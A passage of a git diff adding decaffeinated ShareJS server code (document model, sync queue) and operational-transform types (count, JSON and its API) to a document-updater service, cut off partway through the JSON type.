callbacks = awaitingGetSnapshot[docName] + delete awaitingGetSnapshot[docName] + + if (error) { + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(error) + } + } + } else { + doc = docs[docName] = { + snapshot: data.snapshot, + v: data.v, + type: data.type, + meta: data.meta, + + // Cache of ops + ops: ops || [], + + eventEmitter: new EventEmitter(), + + // Timer before the document will be invalidated from the cache (if the document has no + // listeners) + reapTimer: null, + + // Version of the snapshot thats in the database + committedVersion: committedVersion != null ? committedVersion : data.v, + snapshotWriteLock: false, + dbMeta, + } + + doc.opQueue = makeOpQueue(docName, doc) + + refreshReapingTimeout(docName) + model.emit('add', docName, data) + if (callbacks) { + for (callback of Array.from(callbacks)) { + callback(null, doc) + } + } + } + + return doc + } + + // This is a little helper wrapper around db.getOps. It does two things: + // + // - If there's no database set, it returns an error to the callback + // - It adds version numbers to each op returned from the database + // (These can be inferred from context so the DB doesn't store them, but its useful to have them). + const getOpsInternal = function (docName, start, end, callback) { + if (!db) { + return typeof callback === 'function' + ? callback('Document does not exist') + : undefined + } + + return db.getOps(docName, start, end, function (error, ops) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + let v = start + for (const op of Array.from(ops)) { + op.v = v++ + } + + return typeof callback === 'function' ? callback(null, ops) : undefined + }) + } + + // Load the named document into the cache. This function is re-entrant. + // + // The callback is called with (error, doc) + const load = function (docName, callback) { + if (docs[docName]) { + // The document is already loaded. Return immediately. + __guardMethod__(options.stats, 'cacheHit', o => o.cacheHit('getSnapshot')) + return callback(null, docs[docName]) + } + + // We're a memory store. If we don't have it, nobody does. + if (!db) { + return callback('Document does not exist') + } + + const callbacks = awaitingGetSnapshot[docName] + + // The document is being loaded already. Add ourselves as a callback. + if (callbacks) { + return callbacks.push(callback) + } + + __guardMethod__(options.stats, 'cacheMiss', o1 => + o1.cacheMiss('getSnapshot') + ) + + // The document isn't loaded and isn't being loaded. Load it. + awaitingGetSnapshot[docName] = [callback] + return db.getSnapshot(docName, function (error, data, dbMeta) { + if (error) { + return add(docName, error) + } + + const type = types[data.type] + if (!type) { + console.warn(`Type '${data.type}' missing`) + return callback('Type not found') + } + data.type = type + + const committedVersion = data.v + + // The server can close without saving the most recent document snapshot. + // In this case, there are extra ops which need to be applied before + // returning the snapshot. + return getOpsInternal(docName, data.v, null, function (error, ops) { + if (error) { + return callback(error) + } + + if (ops.length > 0) { + console.log(`Catchup ${docName} ${data.v} -> ${data.v + ops.length}`) + + try { + for (const op of Array.from(ops)) { + data.snapshot = type.apply(data.snapshot, op.op) + data.v++ + } + } catch (e) { + // This should never happen - it indicates that whats in the + // database is invalid. + console.error(`Op data invalid for ${docName}: ${e.stack}`) + return callback('Op data invalid') + } + } + + model.emit('load', docName, data) + return add(docName, error, data, committedVersion, ops, dbMeta) + }) + }) + } + + // This makes sure the cache contains a document. If the doc cache doesn't contain + // a document, it is loaded from the database and stored. + // + // Documents are stored so long as either: + // - They have been accessed within the past #{PERIOD} + // - At least one client has the document open + function refreshReapingTimeout(docName) { + const doc = docs[docName] + if (!doc) { + return + } + + // I want to let the clients list be updated before this is called. + return process.nextTick(function () { + // This is an awkward way to find out the number of clients on a document. If this + // causes performance issues, add a numClients field to the document. + // + // The first check is because its possible that between refreshReapingTimeout being called and this + // event being fired, someone called delete() on the document and hence the doc is something else now. + if ( + doc === docs[docName] && + doc.eventEmitter.listeners('op').length === 0 && + (db || options.forceReaping) && + doc.opQueue.busy === false + ) { + let reapTimer + clearTimeout(doc.reapTimer) + return (doc.reapTimer = reapTimer = + setTimeout( + () => + tryWriteSnapshot(docName, function () { + // If the reaping timeout has been refreshed while we're writing the snapshot, or if we're + // in the middle of applying an operation, don't reap. + if ( + docs[docName].reapTimer === reapTimer && + doc.opQueue.busy === false + ) { + return delete docs[docName] + } + }), + options.reapTime + )) + } + }) + } + + function tryWriteSnapshot(docName, callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + const doc = docs[docName] + + // The doc is closed + if (!doc) { + return typeof callback === 'function' ? callback() : undefined + } + + // The document is already saved. + if (doc.committedVersion === doc.v) { + return typeof callback === 'function' ? callback() : undefined + } + + if (doc.snapshotWriteLock) { + return typeof callback === 'function' + ? callback('Another snapshot write is in progress') + : undefined + } + + doc.snapshotWriteLock = true + + __guardMethod__(options.stats, 'writeSnapshot', o => o.writeSnapshot()) + + const writeSnapshot = + (db != null ? db.writeSnapshot : undefined) || + ((docName, docData, dbMeta, callback) => callback()) + + const data = { + v: doc.v, + meta: doc.meta, + snapshot: doc.snapshot, + // The database doesn't know about object types. + type: doc.type.name, + } + + // Commit snapshot. + return writeSnapshot(docName, data, doc.dbMeta, function (error, dbMeta) { + doc.snapshotWriteLock = false + + // We have to use data.v here because the version in the doc could + // have been updated between the call to writeSnapshot() and now. + doc.committedVersion = data.v + doc.dbMeta = dbMeta + + return typeof callback === 'function' ? callback(error) : undefined + }) + } + + // *** Model interface methods + + // Create a new document. + // + // data should be {snapshot, type, [meta]}. The version of a new document is 0. + this.create = function (docName, type, meta, callback) { + if (typeof meta === 'function') { + ;[meta, callback] = Array.from([{}, meta]) + } + + if (docName.match(/\//)) { + return typeof callback === 'function' + ? callback('Invalid document name') + : undefined + } + if (docs[docName]) { + return typeof callback === 'function' + ? callback('Document already exists') + : undefined + } + + if (typeof type === 'string') { + type = types[type] + } + if (!type) { + return typeof callback === 'function' + ? callback('Type not found') + : undefined + } + + const data = { + snapshot: type.create(), + type: type.name, + meta: meta || {}, + v: 0, + } + + const done = function (error, dbMeta) { + // dbMeta can be used to cache extra state needed by the database to access the document, like an ID or something. + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + // From here on we'll store the object version of the type name. + data.type = type + add(docName, null, data, 0, [], dbMeta) + model.emit('create', docName, data) + return typeof callback === 'function' ? callback() : undefined + } + + if (db) { + return db.create(docName, data, done) + } else { + return done() + } + } + + // Perminantly deletes the specified document. + // If listeners are attached, they are removed. + // + // The callback is called with (error) if there was an error. If error is null / undefined, the + // document was deleted. + // + // WARNING: This isn't well supported throughout the code. (Eg, streaming clients aren't told about the + // deletion. Subsequent op submissions will fail). + this.delete = function (docName, callback) { + const doc = docs[docName] + + if (doc) { + clearTimeout(doc.reapTimer) + delete docs[docName] + } + + const done = function (error) { + if (!error) { + model.emit('delete', docName) + } + return typeof callback === 'function' ? callback(error) : undefined + } + + if (db) { + return db.delete(docName, doc != null ? doc.dbMeta : undefined, done) + } else { + return done(!doc ? 'Document does not exist' : undefined) + } + } + + // This gets all operations from [start...end]. (That is, its not inclusive.) + // + // end can be null. This means 'get me all ops from start'. + // + // Each op returned is in the form {op:o, meta:m, v:version}. + // + // Callback is called with (error, [ops]) + // + // If the document does not exist, getOps doesn't necessarily return an error. This is because + // its awkward to figure out whether or not the document exists for things + // like the redis database backend. I guess its a bit gross having this inconsistant + // with the other DB calls, but its certainly convenient. + // + // Use getVersion() to determine if a document actually exists, if thats what you're + // after. + this.getOps = getOps = function (docName, start, end, callback) { + // getOps will only use the op cache if its there. It won't fill the op cache in. + if (!(start >= 0)) { + throw new Error('start must be 0+') + } + + if (typeof end === 'function') { + ;[end, callback] = Array.from([null, end]) + } + + const ops = docs[docName] != null ? docs[docName].ops : undefined + + if (ops) { + const version = docs[docName].v + + // Ops contains an array of ops. The last op in the list is the last op applied + if (end == null) { + end = version + } + start = Math.min(start, end) + + if (start === end) { + return callback(null, []) + } + + // Base is the version number of the oldest op we have cached + const base = version - ops.length + + // If the database is null, we'll trim to the ops we do have and hope thats enough. + if (start >= base || db === null) { + refreshReapingTimeout(docName) + if (options.stats != null) { + options.stats.cacheHit('getOps') + } + + return callback(null, ops.slice(start - base, end - base)) + } + } + + if (options.stats != null) { + options.stats.cacheMiss('getOps') + } + + return getOpsInternal(docName, start, end, callback) + } + + // Gets the snapshot data for the specified document. + // getSnapshot(docName, callback) + // Callback is called with (error, {v: <version>, type: <type>, snapshot: <snapshot>, meta: <meta>}) + this.getSnapshot = (docName, callback) => + load(docName, (error, doc) => + callback( + error, + doc + ? { v: doc.v, type: doc.type, snapshot: doc.snapshot, meta: doc.meta } + : undefined + ) + ) + + // Gets the latest version # of the document. + // getVersion(docName, callback) + // callback is called with (error, version). + this.getVersion = (docName, callback) => + load(docName, (error, doc) => + callback(error, doc != null ? doc.v : undefined) + ) + + // Apply an op to the specified document. + // The callback is passed (error, applied version #) + // opData = {op:op, v:v, meta:metadata} + // + // Ops are queued before being applied so that the following code applies op C before op B: + // model.applyOp 'doc', OPA, -> model.applyOp 'doc', OPB + // model.applyOp 'doc', OPC + this.applyOp = ( + docName, + opData, + callback // All the logic for this is in makeOpQueue, above. + ) => + load(docName, function (error, doc) { + if (error) { + return callback(error) + } + + return process.nextTick(() => + doc.opQueue(opData, function (error, newVersion) { + refreshReapingTimeout(docName) + return typeof callback === 'function' + ? callback(error, newVersion) + : undefined + }) + ) + }) + + // TODO: store (some) metadata in DB + // TODO: op and meta should be combineable in the op that gets sent + this.applyMetaOp = function (docName, metaOpData, callback) { + const { path, value } = metaOpData.meta + + if (!isArray(path)) { + return typeof callback === 'function' + ? callback('path should be an array') + : undefined + } + + return load(docName, function (error, doc) { + if (error != null) { + return typeof callback === 'function' ? callback(error) : undefined + } else { + let applied = false + switch (path[0]) { + case 'shout': + doc.eventEmitter.emit('op', metaOpData) + applied = true + break + } + + if (applied) { + model.emit('applyMetaOp', docName, path, value) + } + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Listen to all ops from the specified version. If version is in the past, all + // ops since that version are sent immediately to the listener. + // + // The callback is called once the listener is attached, but before any ops have been passed + // to the listener. + // + // This will _not_ edit the document metadata. + // + // If there are any listeners, we don't purge the document from the cache. But be aware, this behaviour + // might change in a future version. + // + // version is the document version at which the document is opened. It can be left out if you want to open + // the document at the most recent version. + // + // listener is called with (opData) each time an op is applied. + // + // callback(error, openedVersion) + this.listen = function (docName, version, listener, callback) { + if (typeof version === 'function') { + ;[version, listener, callback] = Array.from([null, version, listener]) + } + + return load(docName, function (error, doc) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + clearTimeout(doc.reapTimer) + + if (version != null) { + return getOps(docName, version, null, function (error, data) { + if (error) { + return typeof callback === 'function' ? callback(error) : undefined + } + + doc.eventEmitter.on('op', listener) + if (typeof callback === 'function') { + callback(null, version) + } + return (() => { + const result = [] + for (const op of Array.from(data)) { + let needle + listener(op) + + // The listener may well remove itself during the catchup phase. If this happens, break early. + // This is done in a quite inefficient way. (O(n) where n = #listeners on doc) + if ( + ((needle = listener), + !Array.from(doc.eventEmitter.listeners('op')).includes(needle)) + ) { + break + } else { + result.push(undefined) + } + } + return result + })() + }) + } else { + // Version is null / undefined. Just add the listener. + doc.eventEmitter.on('op', listener) + return typeof callback === 'function' + ? callback(null, doc.v) + : undefined + } + }) + } + + // Remove a listener for a particular document. + // + // removeListener(docName, listener) + // + // This is synchronous. + this.removeListener = function (docName, listener) { + // The document should already be loaded. + const doc = docs[docName] + if (!doc) { + throw new Error('removeListener called but document not loaded') + } + + doc.eventEmitter.removeListener('op', listener) + return refreshReapingTimeout(docName) + } + + // Flush saves all snapshot data to the database. I'm not sure whether or not this is actually needed - + // sharejs will happily replay uncommitted ops when documents are re-opened anyway. + this.flush = function (callback) { + if (!db) { + return typeof callback === 'function' ? callback() : undefined + } + + let pendingWrites = 0 + + for (const docName in docs) { + const doc = docs[docName] + if (doc.committedVersion < doc.v) { + pendingWrites++ + // I'm hoping writeSnapshot will always happen in another thread. + tryWriteSnapshot(docName, () => + process.nextTick(function () { + pendingWrites-- + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + }) + ) + } + } + + // If nothing was queued, terminate immediately. + if (pendingWrites === 0) { + return typeof callback === 'function' ? callback() : undefined + } + } + + // Close the database connection. This is needed so nodejs can shut down cleanly. + this.closeDb = function () { + __guardMethod__(db, 'close', o => o.close()) + return (db = null) + } +} + +// Model inherits from EventEmitter. +Model.prototype = new EventEmitter() + +function __guardMethod__(obj, methodName, transform) { + if ( + typeof obj !== 'undefined' && + obj !== null && + typeof obj[methodName] === 'function' + ) { + return transform(obj, methodName) + } else { + return undefined + } +} diff --git a/services/document-updater/app/js/sharejs/server/syncqueue.js b/services/document-updater/app/js/sharejs/server/syncqueue.js new file mode 100644 index 0000000..7795923 --- /dev/null +++ b/services/document-updater/app/js/sharejs/server/syncqueue.js @@ -0,0 +1,60 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// A synchronous processing queue. The queue calls process on the arguments, +// ensuring that process() is only executing once at a time. +// +// process(data, callback) _MUST_ eventually call its callback. +// +// Example: +// +// queue = require 'syncqueue' +// +// fn = queue (data, callback) -> +// asyncthing data, -> +// callback(321) +// +// fn(1) +// fn(2) +// fn(3, (result) -> console.log(result)) +// +// ^--- async thing will only be running once at any time. + +module.exports = function (process) { + if (typeof process !== 'function') { + throw new Error('process is not a function') + } + const queue = [] + + const enqueue = function (data, callback) { + queue.push([data, callback]) + return flush() + } + + enqueue.busy = false + + function flush() { + if (enqueue.busy || queue.length === 0) { + return + } + + enqueue.busy = true + const [data, callback] = Array.from(queue.shift()) + return process(data, function (...result) { + // TODO: Make this not use varargs - varargs are really slow. + enqueue.busy = false + // This is called after busy = false so a user can check if enqueue.busy is set in the callback. + if (callback) { + callback.apply(null, result) + } + return flush() + }) + } + + return enqueue +} diff --git a/services/document-updater/app/js/sharejs/types/README.md b/services/document-updater/app/js/sharejs/types/README.md new file mode 100644 index 0000000..22e6884 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/README.md @@ -0,0 +1,48 @@ +This directory contains all the operational transform code. Each file defines a type. + +Most of the types in here are for testing or demonstration. The only types which are sent to the webclient +are `text` and `json`. + + +# An OT type + +All OT types have the following fields: + +`name`: _(string)_ Name of the type. Should match the filename. +`create() -> snapshot`: Function which creates and returns a new document snapshot + +`apply(snapshot, op) -> snapshot`: A function which creates a new document snapshot with the op applied +`transform(op1, op2, side) -> op1'`: OT transform function. + +Given op1, op2, `apply(s, op2, transform(op1, op2, 'left')) == apply(s, op1, transform(op2, op1, 'right'))`. + +Transform and apply must never modify their arguments. + + +Optional properties: + +`tp2`: _(bool)_ True if the transform function supports TP2. This allows p2p architectures to work. +`compose(op1, op2) -> op`: Create and return a new op which has the same effect as op1 + op2. +`serialize(snapshot) -> JSON object`: Serialize a document to something we can JSON.stringify() +`deserialize(object) -> snapshot`: Deserialize a JSON object into the document's internal snapshot format +`prune(op1', op2, side) -> op1`: Inserse transform function. Only required for TP2 types. +`normalize(op) -> op`: Fix up an op to make it valid. Eg, remove skips of size zero. +`api`: _(object)_ Set of helper methods which will be mixed in to the client document object for manipulating documents. See below. + + +# Examples + +`count` and `simple` are two trivial OT type definitions if you want to take a look. JSON defines +the ot-for-JSON type (see the wiki for documentation) and all the text types define different text +implementations. (I still have no idea which one I like the most, and they're fun to write!) + + +# API + +Types can also define API functions. These methods are mixed into the client's Doc object when a document is created. +You can use them to help construct ops programatically (so users don't need to understand how ops are structured). + +For example, the three text types defined here (text, text-composable and text-tp2) all provide the text API, supplying +`.insert()`, `.del()`, `.getLength` and `.getText` methods. + +See text-api.coffee for an example. diff --git a/services/document-updater/app/js/sharejs/types/count.js b/services/document-updater/app/js/sharejs/types/count.js new file mode 100644 index 0000000..246f6b7 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/count.js @@ -0,0 +1,37 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This is a simple type used for testing other OT code. Each op is [expectedSnapshot, increment] + +exports.name = 'count' +exports.create = () => 1 + +exports.apply = function (snapshot, op) { + const [v, inc] = Array.from(op) + if (snapshot !== v) { + throw new Error(`Op ${v} != snapshot ${snapshot}`) + } + return snapshot + inc +} + +// transform op1 by op2. Return transformed version of op1. +exports.transform = function (op1, op2) { + if (op1[0] !== op2[0]) { + throw new Error(`Op1 ${op1[0]} != op2 ${op2[0]}`) + } + return [op1[0] + op2[1], op1[1]] +} + +exports.compose = function (op1, op2) { + if (op1[0] + op1[1] !== op2[0]) { + throw new Error(`Op1 ${op1} + 1 != op2 ${op2}`) + } + return [op1[0], op1[1] + op2[1]] +} + +exports.generateRandomOp = doc => [[doc, 1], doc + 1] diff --git a/services/document-updater/app/js/sharejs/types/helpers.js b/services/document-updater/app/js/sharejs/types/helpers.js new file mode 100644 index 0000000..0342655 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/helpers.js @@ -0,0 +1,116 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// These methods let you build a transform function from a transformComponent function +// for OT types like text and JSON in which operations are lists of components +// and transforming them requires N^2 work. + +// Add transform and transformX functions for an OT type which has transformComponent defined. +// transformComponent(destination array, component, other component, side) +let bootstrapTransform +exports._bt = bootstrapTransform = function ( + type, + transformComponent, + checkValidOp, + append +) { + let transformX + const transformComponentX = function (left, right, destLeft, destRight) { + transformComponent(destLeft, left, right, 'left') + return transformComponent(destRight, right, left, 'right') + } + + // Transforms rightOp by leftOp. Returns ['rightOp', clientOp'] + type.transformX = + type.transformX = + transformX = + function (leftOp, rightOp) { + checkValidOp(leftOp) + checkValidOp(rightOp) + + const newRightOp = [] + + for (let rightComponent of Array.from(rightOp)) { + // Generate newLeftOp by composing leftOp by rightComponent + const newLeftOp = [] + + let k = 0 + while (k < leftOp.length) { + let l + const nextC = [] + transformComponentX(leftOp[k], rightComponent, newLeftOp, nextC) + k++ + + if (nextC.length === 1) { + rightComponent = nextC[0] + } else if (nextC.length === 0) { + for (l of Array.from(leftOp.slice(k))) { + append(newLeftOp, l) + } + rightComponent = null + break + } else { + // Recurse. + const [l_, r_] = Array.from(transformX(leftOp.slice(k), nextC)) + for (l of Array.from(l_)) { + append(newLeftOp, l) + } + for (const r of Array.from(r_)) { + append(newRightOp, r) + } + rightComponent = null + break + } + } + + if (rightComponent != null) { + append(newRightOp, rightComponent) + } + leftOp = newLeftOp + } + + return [leftOp, newRightOp] + } + + // Transforms op with specified type ('left' or 'right') by otherOp. + return (type.transform = type.transform = + function (op, otherOp, type) { + let _ + if (type !== 'left' && type !== 'right') { + throw new Error("type must be 'left' or 'right'") + } + + if (otherOp.length === 0) { + return op + } + + // TODO: Benchmark with and without this line. I _think_ it'll make a big difference...? + if (op.length === 1 && otherOp.length === 1) { + return transformComponent([], op[0], otherOp[0], type) + } + + if (type === 'left') { + let left + ;[left, _] = Array.from(transformX(op, otherOp)) + return left + } else { + let right + ;[_, right] = Array.from(transformX(otherOp, op)) + return right + } + }) +} + +if (typeof WEB === 'undefined') { + exports.bootstrapTransform = bootstrapTransform +} diff --git a/services/document-updater/app/js/sharejs/types/index.js b/services/document-updater/app/js/sharejs/types/index.js new file mode 100644 index 0000000..7e3d6bb --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/index.js @@ -0,0 +1,25 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const register = function (file) { + const type = require(file) + exports[type.name] = type + try { + return require(`${file}-api`) + } catch (error) {} +} + +// Import all the built-in types. +register('./simple') +register('./count') + +register('./text') +register('./text-composable') +register('./text-tp2') + +register('./json') diff --git a/services/document-updater/app/js/sharejs/types/json-api.js b/services/document-updater/app/js/sharejs/types/json-api.js new file mode 100644 index 0000000..e591f66 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/json-api.js @@ -0,0 +1,356 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// API for JSON OT + +let json +if (typeof WEB === 'undefined') { + json = require('./json') +} + +if (typeof WEB !== 'undefined' && WEB !== null) { + const { extendDoc } = exports + exports.extendDoc = function (name, fn) { + SubDoc.prototype[name] = fn + return extendDoc(name, fn) + } +} + +const depath = function (path) { + if (path.length === 1 && path[0].constructor === Array) { + return path[0] + } else { + return path + } +} + +class SubDoc { + constructor(doc, path) { + this.doc = doc + this.path = path + } + + at(...path) { + return this.doc.at(this.path.concat(depath(path))) + } + + get() { + return this.doc.getAt(this.path) + } + + // for objects and lists + set(value, cb) { + return this.doc.setAt(this.path, value, cb) + } + + // for strings and lists. + insert(pos, value, cb) { + return this.doc.insertAt(this.path, pos, value, cb) + } + + // for strings + del(pos, length, cb) { + return this.doc.deleteTextAt(this.path, length, pos, cb) + } + + // for objects and lists + remove(cb) { + return this.doc.removeAt(this.path, cb) + } + + push(value, cb) { + return this.insert(this.get().length, value, cb) + } + + move(from, to, cb) { + return this.doc.moveAt(this.path, from, to, cb) + } + + add(amount, cb) { + return this.doc.addAt(this.path, amount, cb) + } + + on(event, cb) { + return this.doc.addListener(this.path, event, cb) + } + + removeListener(l) { + return this.doc.removeListener(l) + } + + // text API compatibility + getLength() { + return this.get().length + } + + getText() { + return this.get() + } +} + +const traverse = function (snapshot, path) { + const container = { data: snapshot } + let key = 'data' + let elem = container + for (const p of Array.from(path)) { + elem = elem[key] + key = p + if (typeof elem === 'undefined') { + throw new Error('bad path') + } + } + return { elem, key } +} + +const pathEquals = function (p1, p2) { + if (p1.length !== p2.length) { + return false + } + for (let i = 0; i < p1.length; i++) { + const e = p1[i] + if (e !== p2[i]) { + return false + } + } + return true +} + +json.api = { + provides: { json: true }, + + at(...path) { + return new SubDoc(this, depath(path)) + }, + + get() { + return this.snapshot + }, + set(value, cb) { + return this.setAt([], value, cb) + }, + + getAt(path) { + const { elem, key } = traverse(this.snapshot, path) + return elem[key] + }, + + setAt(path, value, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = { p: path } + if (elem.constructor === Array) { + op.li = value + if (typeof elem[key] !== 'undefined') { + op.ld = elem[key] + } + } else if (typeof elem === 'object') { + op.oi = value + if (typeof elem[key] !== 'undefined') { + op.od = elem[key] + } + } else { + throw new Error('bad path') + } + return this.submitOp([op], cb) + }, + + removeAt(path, cb) { + const { elem, key } = traverse(this.snapshot, path) + if (typeof elem[key] === 'undefined') { + throw new Error('no element at that path') + } + const op = { p: path } + if (elem.constructor === Array) { + op.ld = elem[key] + } else if (typeof elem === 'object') { + op.od = elem[key] + } else { + throw new Error('bad path') + } + return this.submitOp([op], cb) + }, + + insertAt(path, pos, value, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = { p: path.concat(pos) } + if (elem[key].constructor === Array) { + op.li = value + } else if (typeof elem[key] === 'string') { + op.si = value + } + return this.submitOp([op], cb) + }, + + moveAt(path, from, to, cb) { + const op = [{ p: path.concat(from), lm: to }] + return this.submitOp(op, cb) + }, + + addAt(path, amount, cb) { + const op = [{ p: path, na: amount }] + return this.submitOp(op, cb) + }, + + deleteTextAt(path, length, pos, cb) { + const { elem, key } = traverse(this.snapshot, path) + const op = [{ p: path.concat(pos), sd: elem[key].slice(pos, pos + length) }] + return this.submitOp(op, cb) + }, + + addListener(path, event, cb) { + const l = { path, event, cb } + this._listeners.push(l) + return l + }, + removeListener(l) { + const i = this._listeners.indexOf(l) + if (i < 0) { + return false + } + this._listeners.splice(i, 1) + return true + }, + _register() { + this._listeners = [] + this.on('change', function (op) { + return (() => { + const result = [] + for (const c of Array.from(op)) { + let i + if (c.na !== undefined || c.si !== undefined || c.sd !== undefined) { + // no change to structure + continue + } + const toRemove = [] + for (i = 0; i < this._listeners.length; i++) { + // Transform a dummy op by the incoming op to work out what + // should happen to the listener. + const l = this._listeners[i] + const dummy = { p: l.path, na: 0 } + const xformed = this.type.transformComponent([], dummy, c, 'left') + if (xformed.length === 0) { + // The op was transformed to noop, so we should delete the listener. + toRemove.push(i) + } else if (xformed.length === 1) { + // The op remained, so grab its new path into the listener. + l.path = xformed[0].p + } else { + throw new Error( + "Bad assumption in json-api: xforming an 'si' op will always result in 0 or 1 components." + ) + } + } + toRemove.sort((a, b) => b - a) + result.push( + (() => { + const result1 = [] + for (i of Array.from(toRemove)) { + result1.push(this._listeners.splice(i, 1)) + } + return result1 + })() + ) + } + return result + })() + }) + return this.on('remoteop', function (op) { + return (() => { + const result = [] + for (const c of Array.from(op)) { + const matchPath = + c.na === undefined ? c.p.slice(0, c.p.length - 1) : c.p + result.push( + (() => { + const result1 = [] + for (const { path, event, cb } of Array.from(this._listeners)) { + let common + if (pathEquals(path, matchPath)) { + switch (event) { + case 'insert': + if (c.li !== undefined && c.ld === undefined) { + result1.push(cb(c.p[c.p.length - 1], c.li)) + } else if (c.oi !== undefined && c.od === undefined) { + result1.push(cb(c.p[c.p.length - 1], c.oi)) + } else if (c.si !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.si)) + } else { + result1.push(undefined) + } + break + case 'delete': + if (c.li === undefined && c.ld !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.ld)) + } else if (c.oi === undefined && c.od !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.od)) + } else if (c.sd !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.sd)) + } else { + result1.push(undefined) + } + break + case 'replace': + if (c.li !== undefined && c.ld !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.ld, c.li)) + } else if (c.oi !== undefined && c.od !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.od, c.oi)) + } else { + result1.push(undefined) + } + break + case 'move': + if (c.lm !== undefined) { + result1.push(cb(c.p[c.p.length - 1], c.lm)) + } else { + result1.push(undefined) + } + break + case 'add': + if (c.na !== undefined) { + result1.push(cb(c.na)) + } else { + result1.push(undefined) + } + break + default: + result1.push(undefined) + } + } else if ( + (common = this.type.commonPath(matchPath, path)) != null + ) { + if (event === 'child op') { + if ( + matchPath.length === path.length && + path.length === common + ) { + throw new Error( + "paths match length and have commonality, but aren't equal?" + ) + } + const childPath = c.p.slice(common + 1) + result1.push(cb(childPath, c)) + } else { + result1.push(undefined) + } + } else { + result1.push(undefined) + } + } + return result1 + })() + ) + } + return result + })() + }) + }, +} diff --git a/services/document-updater/app/js/sharejs/types/json.js b/services/document-updater/app/js/sharejs/types/json.js new file mode 100644 index 0000000..3422d61 --- /dev/null +++ b/services/document-updater/app/js/sharejs/types/json.js @@ -0,0 +1,630 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-useless-catch, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// This is the implementation of the JSON OT type. +// +// Spec is here: https://github.com/josephg/ShareJS/wiki/JSON-Operations + +let text +if (typeof WEB !== 'undefined' && WEB !== null) { + ;({ text } = exports.types) +} else { + text = require('./text') +} + +const json = {} + +json.name = 'json' + +json.create = () => null + +json.invertComponent = function (c) { + const c_ = { p: c.p } + if (c.si !== undefined) { + c_.sd = c.si + } + if (c.sd !== undefined) { + c_.si = c.sd + } + if (c.oi !== undefined) { + c_.od = c.oi + } + if (c.od !== undefined) { + c_.oi = c.od + } + if (c.li !== undefined) { + c_.ld = c.li + } + if (c.ld !== undefined) { + c_.li = c.ld + } + if (c.na !== undefined) { + c_.na = -c.na + } + if (c.lm !== undefined) { + c_.lm = c.p[c.p.length - 1] + c_.p = c.p.slice(0, c.p.length - 1).concat([c.lm]) + } + return c_ +} + +json.invert = op => + Array.from(op.slice().reverse()).map(c => json.invertComponent(c)) + +json.checkValidOp = function (op) {} + +const isArray = o => Object.prototype.toString.call(o) === '[object Array]' +json.checkList = function (elem) { + if (!isArray(elem)) { + throw new Error('Referenced element not a list') + } +} + +json.checkObj = function (elem) { + if (elem.constructor !== Object) { + throw new Error( + `Referenced element not an object (it was ${JSON.stringify(elem)})` + ) + } +} + +json.apply = function (snapshot, op) { + json.checkValidOp(op) + op = clone(op) + + const container = { data: clone(snapshot) } + + try { + for (let i = 0; i < op.length; i++) { + const c = op[i] + let parent = null + let parentkey = null + let elem = container + let key = 'data' + + for (const p of Array.from(c.p)) { + parent = elem + parentkey = key + elem = elem[key] + key = p + + if (parent == null) { + throw new Error('Path invalid') + } + } + + if (c.na !== undefined) { + // Number add + if (typeof elem[key] !== 'number') { + throw new Error('Referenced element not a number') + } + elem[key] += c.na + } else if (c.si !== undefined) { + // String insert + if (typeof elem !== 'string') { + throw new Error( + `Referenced element not a string (it was ${JSON.stringify(elem)})` + ) + } + parent[parentkey] = elem.slice(0, key) + c.si + elem.slice(key) + } else if (c.sd !== undefined) { + // String delete + if (typeof elem !== 'string') { + throw new Error('Referenced element not a 